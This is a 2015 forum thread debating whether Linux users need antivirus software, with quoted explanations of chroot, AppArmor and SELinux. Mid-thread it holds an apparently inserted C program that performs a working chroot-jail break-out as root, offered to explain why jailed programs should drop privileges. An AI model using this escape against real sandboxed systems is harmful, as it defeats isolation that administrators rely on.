This post was last edited by vichui on 2015-9-18 12:40

Reply to #10 samiux

That's why I have to say you have misunderstood deeply.
What an advanced Linux user will tell others is "SECURE YOUR SYSTEM"; anti-virus and malware detection software is "NO USE". That doesn't mean Linux is impossible to be infected by viruses and malware!!

Linux has the possibility to be infected by viruses and malware!! But to protect your Linux, the software listed in your article has no use, and your articles LEAD a newbie to think they are safe after using the software you listed. Actually there is no difference after using the software you listed. -- That is what I mean by "MORE RISKY"!! RISKY is the mind, not the system.

Moreover, most Linux infections can be prevented if you have secured your system, including "Browser attack".

Of course using Linux has a learning curve. This is a MUST and there is no shortcut.
Yes, there is no "bullet proof" system!! What you can have is a nearly "bullet proof" system, and that needs your continuous maintenance, and any naivety will kill it.

"As of 2011 the majority of active malware threats were worms or trojans rather than viruses." --> do you know why? The increase doesn't mean anything. The increase just
means that user behaviour is getting worse!!

Why do advanced users say Linux can live without any anti-virus and malware detection software??
The key point is the user: a Windows user is trained to install software to prevent infection, while a REAL Linux user is trained and has to secure their system over time. That is the difference between an Intrusion Detection System and an Intrusion Prevention System.
In the Linux world, we emphasize prevention over detection.

So when you hear people say Linux needs no anti-virus and malware detection software next time, the main message is "Could you please learn how to use Linux in a correct way?".


@vichui,

In my opinion, the trend of worms and trojans has increased due to the fact that viruses cannot remotely control the victim systems and gain benefit from them, while worms or trojans can do almost anything on victim systems.  In the meantime, applications are becoming more complicated and user-friendly than before.  Security and user-friendliness are in opposite directions.

It is true that a small portion of users (including Windows and Linux) are not using their systems in a proper way or in a secure way.  There is a large portion of users who are using their systems in a proper way but they do not have security in mind.  Almost all users (even advanced users) do not fully understand what information security is about and what vulnerabilities are about, as well as how the hackers did it.

For example, in the recently famous telephone deception in Hong Kong, almost all victims were using their telephone sets in a very correct way (I think so).  However, they were deceived.

Moreover, do you think almost all citizens are using locks and metal gates in a correct way?  Not just locking them up?  Why have their flats been burgled?

So, what are a secured system and secured behaviour?  Just up-to-date and with a strong password in the system?  Users not doing illegal and unethical activities?  Is that enough?

When someone else tells you that locks and metal gates are useless, you are not required to install them.  You just learn how to use your flat (maybe your wooden door) in a correct way.  Is that true?  Or did I misunderstand your message again?

Windows users install anti-virus as they learnt that it is necessary.  Yes, they are trained to be.  It is because of the viruses of years ago.  At that time, viruses only did harm to the system and operation, but the hackers had no profit gains.  However, hackers can gain profit from their victims with malware today.

Nowadays, Windows users still install anti-virus as they do know that worms and trojans are scarier.  Even if they installed anti-virus, they may also have a chance to be infected.

Generally speaking, Windows and Linux are very similar systems in terms of security today.  Why can Windows users armour themselves but Linux users need to be naked?  I think that it is nonsense.  Even you, no matter whether a Windows or Linux user, have a chance to be infected by malware when you are using your systems in a correct/proper/secure way with or without anti-virus/malware programs.  That is why you need precautionary measures, that is what you called "Prevention".

By the way, I am really curious to know how you prevent being attacked by a "Browser Attack" by not installing any additional software but just using your system in a correct way?

May I tell a story?  Once upon a time, when a scientist said that the earth is round and not flat, he would be burnt to death.

Thank you.

Samiux


Why not? Of course Linux is vulnerable to malware too.  Malware code does not need to be running as root; running as a non-privileged user can also cause damage, e.g. leaking that non-privileged user's data.  Malware run as a non-privileged user can also participate in network attacks.  So your statement is true.


Reply to #12 samiux

Don't you know locks have different security levels?
With a weak gate and lock, you need more add-ons to protect and to monitor.
With a strong gate and lock, you need fewer add-ons to protect and to monitor.

"Generally speaking, Windows and Linux are very similar systems in terms of security today". Is it true? Absolutely not!! It is well known that Linux is more secure than Windows. Why? It is all about their kernel design. Even the same browser - Firefox or Chromium, are they the same?

How? Many answers: chroot, iptables rules, apprmon and so on and so on..
But again, keep your system up-to-date. That's the result of my using your so-called naked Linux for 10 years without any infection.


This post was last edited by samiux on 2015-9-18 17:26

@vichui,

I doubt that there is any lock that a locksmith (or maybe a lockpicker) cannot open.

Windows and Linux are very similar operating systems in terms of security.  They all have similar protection schemes, such as ASLR, DEP, XD/NX etc. as well as user profiles.

I am curious whether Chromium is more secure than Firefox?  Whether Linux is more secure than Windows?  I doubt it too.

For Chromium, the recent vulnerability is GLSA 201507-18.  Do you really believe that Chromium is more secure than Firefox?

For Linux, the CVE database of the Linux kernel is here.  Do you really believe that Linux is more secure than Windows?

"apprmon"?  Maybe you are talking about AppArmor.  AppArmor is not available or cannot be easily installed on some Linux systems.

You are talking about using chroot, iptables, AppArmor etc. to secure your browser?  If so, I do not know how you can secure your browser with iptables rules.

Okay, I think we need to know the following terms (chroot, AppArmor and SELinux) before going further.

What is chroot?

According to Wikipedia, a chroot on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children. A program that is run in such a modified environment cannot name (and therefore normally cannot access) files outside the designated directory tree. The term "chroot" may refer to the chroot(2) system call or the chroot(8) wrapper program. The modified environment is called a "chroot jail".

Chroot has been included in user namespaces since Linux kernel 3.8.

There are some limitations according to Wikipedia.  They are:

The chroot mechanism is not intended to defend against intentional tampering by privileged (root) users. On most systems, chroot contexts do not stack properly and chrooted programs with sufficient privileges may perform a second chroot to break out. To mitigate the risk of this security weakness, chrooted programs should relinquish root privileges as soon as practical after chrooting, or other mechanisms – such as FreeBSD Jails – should be used instead. Note that some systems, such as FreeBSD, take precautions to prevent the second chroot attack.

On systems that support device nodes on ordinary filesystems, a chrooted root user can still create device nodes and mount the file systems on them; thus, the chroot mechanism is not intended by itself to be used to block low-level access to system devices by privileged users. It is not intended to restrict the use of resources like I/O, bandwidth, disk space or CPU time. Most Unixes are not completely file system-oriented and leave potentially disruptive functionality like networking and process control available through the system call interface to a chrooted program.

At startup, programs expect to find scratch space, configuration files, device nodes and shared libraries at certain preset locations. For a chrooted program to successfully start, the chroot directory must be populated with a minimum set of these files. This can make chroot difficult to use as a general sandboxing mechanism.

Only the root user can perform a chroot. This is intended to prevent users from putting a setuid program inside a specially crafted chroot jail (for example, with a fake /etc/passwd and /etc/shadow file) that would fool it into a privilege escalation.

Some Unixes offer extensions of the chroot mechanism to address at least some of these limitations (see Implementations of operating system-level virtualization technology).

What is AppArmor?

According to Wikipedia, AppArmor ("Application Armor") is a Linux kernel security module released under the GNU General Public License that allows the system administrator to associate a security profile with each program, which restricts the capabilities of that program. It supplements the traditional Unix discretionary access control (DAC) model by providing mandatory access control (MAC). It was included as of the 2.6.36 version of the mainline Linux kernel. Since 2009, Canonical Ltd. contributes to the ongoing AppArmor development.

In addition to manually specifying profiles, AppArmor includes a learning mode, in which violations of the profile are logged, but not prevented. This log can then be turned into a profile, based on the program's typical behavior.

AppArmor is implemented using the Linux Security Modules (LSM) kernel interface.

AppArmor is offered in part as an alternative to SELinux, which critics consider difficult for administrators to set up and maintain.  Unlike SELinux, which is based on applying labels to files, AppArmor works with file paths. Proponents of AppArmor claim that it is less complex and easier for the average user to learn than SELinux. They also claim that AppArmor requires fewer modifications to work with existing systems: for example, SELinux requires a filesystem that supports "security labels", and thus cannot provide access control for files mounted via NFS. AppArmor is filesystem-agnostic.

What is SELinux?

According to Wikipedia, Security-Enhanced Linux (SELinux) is a Linux kernel security module that provides a mechanism for supporting access control security policies, including United States Department of Defense–style mandatory access controls (MAC).

SELinux is a set of kernel modifications and user-space tools that have been added to various Linux distributions. Its architecture strives to separate enforcement of security decisions from the security policy itself and streamlines the volume of software charged with security policy enforcement. The key concepts underlying SELinux can be traced to several earlier projects by the United States National Security Agency (NSA).

After knowing what chroot, AppArmor and SELinux are, you may know that you need some effort to make them work on your systems.  They may not be implemented on your Linux system by default.  If they are implemented by default, they may have limited services (or say programs/processes) to be protected.

Personally, I prefer AppArmor to chroot and SELinux.  It is because it is more user-friendly and easier for troubleshooting.  As far as I know, even Ubuntu does not enable (I mean enforce mode) AppArmor for Chromium and Firefox by default.

For general users, it is too hard for them to implement chroot, AppArmor or SELinux even if they are following tutorials or guides.  Basically, AppArmor on Ubuntu is easier to implement when they are following tutorials or guides if they have a good one.

Fair to say, even some Windows users can run their Windows systems without any anti-virus for over 10 years without getting any infection.  Or, maybe they do not know that they are already infected, just like you.

In conclusion, Linux users require at least some degree of protection, such as AppArmor and/or anti-malware.

Thank you.

Samiux

Update reason : fix typo
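The chroot limitation quoted in the post above (a chrooted program that keeps root privileges can perform a second chroot and break out) is easy to see in code. The program below is an added example written for this thread, not code from the original post or from any project named in it. It assumes a writable /tmp and a Linux kernel; it only demonstrates the break-out when run as root (CAP_SYS_CHROOT), otherwise it reports that chroot() was not permitted.

```c
/* Added example (not from the original post): the "second chroot"
 * break-out that the quoted chroot limitations describe.
 * Needs root (CAP_SYS_CHROOT); unprivileged, chroot() fails with EPERM. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Return values of attempt_chroot_escape(). */
enum { ESCAPE_NOT_PERMITTED = -1, ESCAPE_FAILED = 0, ESCAPE_SUCCEEDED = 1 };

/* Compare the process's current view of "/" with a recorded one. */
static int same_root(const struct stat *before)
{
    struct stat now;
    if (stat("/", &now) != 0)
        return 0;
    return now.st_dev == before->st_dev && now.st_ino == before->st_ino;
}

/* Create a jail at 'jail' (assumed path, e.g. /tmp/chroot_demo_jail),
 * enter it the proper way (chdir, then chroot), then break out while
 * still root by nesting a second chroot. */
int attempt_chroot_escape(const char *jail)
{
    struct stat real_root;
    if (stat("/", &real_root) != 0)
        return ESCAPE_FAILED;

    if (mkdir(jail, 0700) != 0 && errno != EEXIST)
        return ESCAPE_FAILED;

    /* Step 1: enter the jail correctly so the cwd is inside it. */
    if (chdir(jail) != 0)
        return ESCAPE_FAILED;
    if (chroot(jail) != 0)
        return ESCAPE_NOT_PERMITTED;   /* EPERM without CAP_SYS_CHROOT */

    /* "/" is now the jail. A careful jailer would drop root here;
     * this program deliberately does not, which is the weakness. */
    if (same_root(&real_root))
        return ESCAPE_FAILED;

    /* Step 2: nest a second chroot WITHOUT chdir, so the cwd ends up
     * outside the new root directory. */
    if (mkdir("breakout", 0700) != 0 && errno != EEXIST)
        return ESCAPE_FAILED;
    if (chroot("breakout") != 0)
        return ESCAPE_FAILED;

    /* Step 3: ".." is only clamped at the root when the cwd is under
     * it; from outside it walks all the way up to the real "/". */
    for (int i = 0; i < 64; i++)
        if (chdir("..") != 0)
            return ESCAPE_FAILED;

    /* Step 4: make the real filesystem root the process root again. */
    if (chroot(".") != 0)
        return ESCAPE_FAILED;

    return same_root(&real_root) ? ESCAPE_SUCCEEDED : ESCAPE_FAILED;
}

int main(void)
{
    int r = attempt_chroot_escape("/tmp/chroot_demo_jail");
    if (r == ESCAPE_NOT_PERMITTED)
        puts("chroot() not permitted: run as root to see the break-out");
    else if (r == ESCAPE_SUCCEEDED)
        puts("escaped: the process root is the real / again");
    else
        puts("break-out did not succeed");
    return r == ESCAPE_FAILED ? 1 : 0;
}
```

Build with `cc -o chroot_escape chroot_escape.c` and run it once unprivileged and once as root. This is the reason the quoted text says a chrooted program should relinquish root as soon as practical: once the process has dropped to an unprivileged user, the second chroot() in step 2 fails with EPERM, and because the cwd then stays inside the jail, the ".." walk in step 3 is clamped at the jail root.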


Am I hypersensitive in saying Linux requires anti-malware or other protection?

I am sure that I am not.  About 3 hours earlier, security researchers posted to their blog/site that a lot of WordPress websites have been compromised and the number of compromised sites has increased significantly in the past 48 hours.

The malware's final goal is to use as many compromised websites as possible to redirect all their visitors to a Nuclear Exploit Kit landing page. These landing pages will try a wide variety of available browser exploits to infect the computers of unsuspecting visitors.

If you think about it, the compromised websites are just a means for the criminals to get access to as many endpoint desktops as they can. What's the easiest way to reach out to endpoints?  Websites, of course.

Most WordPress sites are built on Linux systems.  The infection media are websites and browsers.  Those browsers may be on Windows or Linux or even Mac OS X etc.

Hope you are alerted to what I said before.

Thank you.

Samiux


Note: the author has been banned or deleted; the content is automatically hidden.


@hollyhui99a,

Sorry about that.  It is very hard for me to type an article in Chinese.  Please use Google Translate when necessary.

Thank you.

Samiux


haha, the point is why the WordPress sites can be infected?

Have you thought about it?

I am also running more than 4 WordPress sites, but none of them are infected..

It is all about setting problems and bugs.
Yes, you will know if you have installed malware detection, but that means you were infected.

For how to prevent? Users like you will not fully understand, because you don't think it is possible..


This post was last edited by samiux on 2015-9-18 21:17

@vichui,

I do not fully understand how to prevent it and think it is impossible?  You may be right or may be wrong.

I think it is high time for me to introduce myself in order to let you know my basic background.  Although it does not indicate something, it will tell you what I am.

I am an Offensive Security Certified Expert (OSCE), Offensive Security Certified Professional (OSCP) and Offensive Security Wireless Professional (OSWP).  To make it simple, I can attack and do exploit development as well as defense.  Basically, I fulfil the job requirements of the UK Government Ministry of Defence.

I am also managing a small network with a Linux web server, Linux servers, Linux desktops and Windows desktops as well as two Intrusion Prevention System sensors.  I also know how to program, such as in bash, PHP, Python, Node.js, and C.  I also have some successful open source projects.  When I have spare time, I do infosec research.

You can say that I am an attacker, developer and sysadmin.  I build things and also break things.  I have the attacker's point of view when handling Information Technology and Information Security matters.  I do know what hackers do.  I almost also know what and how they think.

I have been a long-term Linux user since 1995.  I switched to Ubuntu in 2006.  I have also been a blogger since 2007.

My slogans are "Think like a criminal and act as a professional" and "While you do not know attack, how can you know about defense?".

Okay, let's go back to the news.  You focus on the WordPress site compromises while I focus on the WordPress site compromises and browser exploits.  The users' browsers are being exploited when they are visiting the malicious sites (compromised sites).

By the way, your self-introduction is welcome.

Thank you.

Samiux

Update reason : fix typo
